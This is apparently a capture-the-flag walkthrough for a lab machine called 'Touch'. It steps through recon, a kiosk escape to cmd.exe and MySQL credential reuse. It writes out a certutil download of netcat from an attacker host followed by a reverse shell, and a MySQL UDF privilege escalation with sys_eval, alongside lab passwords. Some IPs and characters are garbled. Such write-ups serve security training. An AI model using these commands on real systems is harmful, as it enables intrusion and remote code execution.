Machine Information
Machine Information
In the Layover machine, you uncovered a name and a booking confirmation code. Maybe they’ll come in handy here? Jenny Crawford / KS7X2M
The clue says: “you uncovered a name and a booking confirmation code” โ but it doesn’t say the code is a password. It’s a booking confirmation code, which is probably meant to be entered into a booking lookup / check-in feature somewhere on Touch.
Two likely scenarios:
- The code is a reference for a web app โ a “Manage your booking” page where you enter
KS7X2Mto retrieve details (which may include a password or further credentials). - The name is a username โ but the password is something you’ll find after using the code, not the code itself.
Reconnaissance
Command: nmap -sC -sV -p- –min-rate 5000 -T4 10.129.80.81 -oN touch.txt

Command: curl -i http://10.129.80.81:8443/login

What the Login Page Tells Us
The form:
html
<form method="POST" action="/login">
<input type="password" name="password" placeholder="Device password" required>
</form>
Only a password field. No username.
The hint:
html
<div class="login-hint" title="The default password is the device serial number included in your DeviceHub packaging.">Forgot your password?</div>
“The default password is the device serial number included in your DeviceHub packaging.”
So the password is a device serial number โ not KS7X2M.
Command: curl -s http://10.129.80.80:8443/api/status

so enter the password: NX-DH-2024-B7042

We found some passwords let’s try the following command
Command: xfreerdp /v:10.129.80.80 /u:Kio****er /p:’K***k***6#’ /cert:ignore

Choose the language!

Command: curl -i -b touch_cookies.txt “http://10.129.80.811:8443/api/scan/last-capture” -o lastcap.bin

Command: curl -s -b touch_cookies.txt -X PUT http://10.129.80.211:8443/api/scanner/settings
-H “Content-Type: application/json”
-d ‘{“resolution”:”XSSPROBE123″,”format”:”JPEG”,”mrzDetection”:true,”autoCalibrate”:true}’
Command: curl -s -b touch_cookies.txt http://10.129.80.211:8443/scanner | grep -i “XSSPROBE123”

Command: curl -i -b touch_cookies.txt -X PUT http://10.129.80.11:8443/api/scanner/settings
-H “Content-Type: application/json”
-d ‘{“proto“:{“admin”:true,”isAdmin”:true,”role”:”admin”}}’

back to the touch sceen:
Command: xfreerdp /v:10.129.22.12 /u:KioskUser /p:’K!0sk2026#’ /cert:ignore /dynamic-resolution \

You need to disable the scanner by logging into the website:http://10.129.83.241:8443/scanner

Click on Powe Off button

Now click on Scan Passport, you will receive the following error! click on the link to open the browser

You will be redirected to the browser, type: C://Windows//System32//cmd.exe

now click on the folder shown in on the downloads Tab as above, it will take you Downloads:

GO to Desktop and the flag

or through CMD
Command: cd ../Desktop/, type user.txt
Root Privilege Escalation
cd /tmp
cp /usr/share/windows-resources/binaries/nc.exe .
python3 -m http.server 1234

Command: certutil -urlcache -split -f http://10.10.12.156:3230/nc.exe n.exe && n.exe -e cmd.exe 10.10.13.46 1234

Double click on the program file taken from Linux and you will connection confirmation

Now go to this location, you will find database! C:\Pro

look at this file!!!

Confirm that mysql is running:
Command: netstat -ano | findstr :3306

Command: C:\MySQL\bin\mysql.exe -u kiosk_app -pK!0sk_R3pl1ca#DB -h 127.0.0.1 -P 3306 -e “SHOW DATABASES;”

Command: C:\MySQL\bin\mysql.exe -u kiosk_app -pK!0sk_R3pl1ca#DB -h 127.0.0.1 -P 3306 htb_airways -e “SHOW TABLES;”

Command: C:\MySQL\bin\mysql.exe -u kiosk_app -pK!0sk_R3pl1ca#DB -h 127.0.0.1 -P 3306 htb_airways -e “SELECT employee_id, email, auth_code, role, active FROM _htb_staff;”

Command: dir “C:\ProgramData\HTB Airways” /s /b

Command: type “C:\ProgramData\HTB Airways\refresh-dates.bat”

Command: ls -la /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.dll

Command: cp /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.dll

You will need to copy those, start your listener on port 9090

on the target, Command: C:\MySQL\bin\mysql.exe -u root -p”HTB@irw4ys_DB!2026″ -e “SHOW VARIABLES LIKE ‘plugin_dir’;”

Command: icacls “C:\MySQL\lib\plugin” > C:\Users\KioskUser\Downloads\perms.txt

Command: type C:\Users\KioskUser\Downloads\perms.txt

Command: certutil -urlcache -split -f http://10.10.11.21:9090/lib_mysqludf_sys_64.dll C:\MySQL\lib\plugin\lib_mysqludf_sys_64.dll

Command: C:\MySQL\bin\mysql.exe -u root -p”HTB@irw4ys_DB!2026″ -e “CREATE FUNCTION sys_eval RETURNS STRING SONAME ‘lib_mysqludf_sys_64.dll’;”

Command: C:\MySQL\bin\mysql.exe -u root -p”HTB@irw4ys_DB!2026″ -e “SELECT (sys_eval(‘whoami’));”

Hex to Text Link

Command: C:\MySQL\bin\mysql.exe -u root -p”HTB@irw4ys_DB!2026″ -e “SELECT sys_eval(‘type C:\Users\Administrator\Desktop\root.txt’);”

Use the converter again to fetch the flag:



Leave a Reply